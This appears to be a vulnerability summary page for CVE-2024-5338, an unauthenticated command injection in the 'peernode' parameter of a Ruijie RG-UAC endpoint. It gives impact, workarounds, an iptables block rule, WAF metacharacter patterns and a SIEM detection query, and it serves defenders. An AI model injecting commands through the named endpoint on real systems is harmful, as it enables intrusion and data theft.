CVE-2024-5338
📋 TL;DR
This CVE describes a critical OS command injection vulnerability in Ruijie RG-UAC Unified Internet Behavior Management Audit System. Attackers can execute arbitrary commands remotely by manipulating the 'peernode' parameter in the /view/vpn/autovpn/online.php file. Organizations using Ruijie RG-UAC systems up to May 16, 2024 are affected.
💻 Affected Systems
- Ruijie RG-UAC Unified Internet Behavior Management Audit System
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary commands with system privileges, potentially leading to data theft, lateral movement, or ransomware deployment.
Likely Case
Remote code execution enabling attackers to install backdoors, exfiltrate sensitive data, or disrupt network operations.
If Mitigated
Limited impact if proper network segmentation, web application firewalls, and input validation are in place.
🎯 Exploit Status
Exploit has been publicly disclosed via GitHub and vuldb.com. The vulnerability allows remote exploitation without authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Vendor was contacted but did not respond. Consider workarounds or system replacement.
🔧 Temporary Workarounds
Web Application Firewall Rule
allBlock or sanitize requests to /view/vpn/autovpn/online.php containing suspicious peernode parameters
WAF specific - configure rules to block patterns like ;, |, &, $, (, ) in peernode parameter
Network Access Control
linuxRestrict access to the vulnerable endpoint using network segmentation or ACLs
iptables -A INPUT -p tcp --dport [WEB_PORT] -m string --string "/view/vpn/autovpn/online.php" --algo bm -j DROP
🧯 If You Can't Patch
- Isolate the Ruijie RG-UAC system from the internet and restrict internal access to authorized users only
- Implement strict input validation and sanitization for all user-supplied data in web applications
🔍 How to Verify
Check if Vulnerable:
Test if the /view/vpn/autovpn/online.php endpoint accepts and executes OS commands via the peernode parameter. Use safe testing methods like time-based payloads.Check Version:
Check system version through web interface or administrative console. Specific command unavailable in documentation.Verify Fix Applied:
Verify that command injection attempts via the peernode parameter are blocked or sanitized, and that the endpoint no longer executes arbitrary commands.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /view/vpn/autovpn/online.php with shell metacharacters in parameters
- Unexpected system command execution from web server process
Network Indicators:
- HTTP requests containing OS command injection patterns (;, |, &, $, etc.) in URL parameters
- Outbound connections from web server to unexpected destinations
SIEM Query:
source="web_logs" AND url="*online.php*" AND (param="*;*" OR param="*|*" OR param="*&*" OR param="*$(*")🔗 References
- https://github.com/h0e4a0r1t/h0e4a0r1t.github.io/blob/master/2024/z%7CYVDv%7CHKA)*%5CdK!/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-autovpn%3Aonline.php.pdf
- https://vuldb.com/?ctiid.266244
- https://vuldb.com/?id.266244
- https://vuldb.com/?submit.336036
- https://github.com/h0e4a0r1t/h0e4a0r1t.github.io/blob/master/2024/z%7CYVDv%7CHKA)*%5CdK!/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-autovpn%3Aonline.php.pdf
- https://vuldb.com/?ctiid.266244
- https://vuldb.com/?id.266244
- https://vuldb.com/?submit.336036
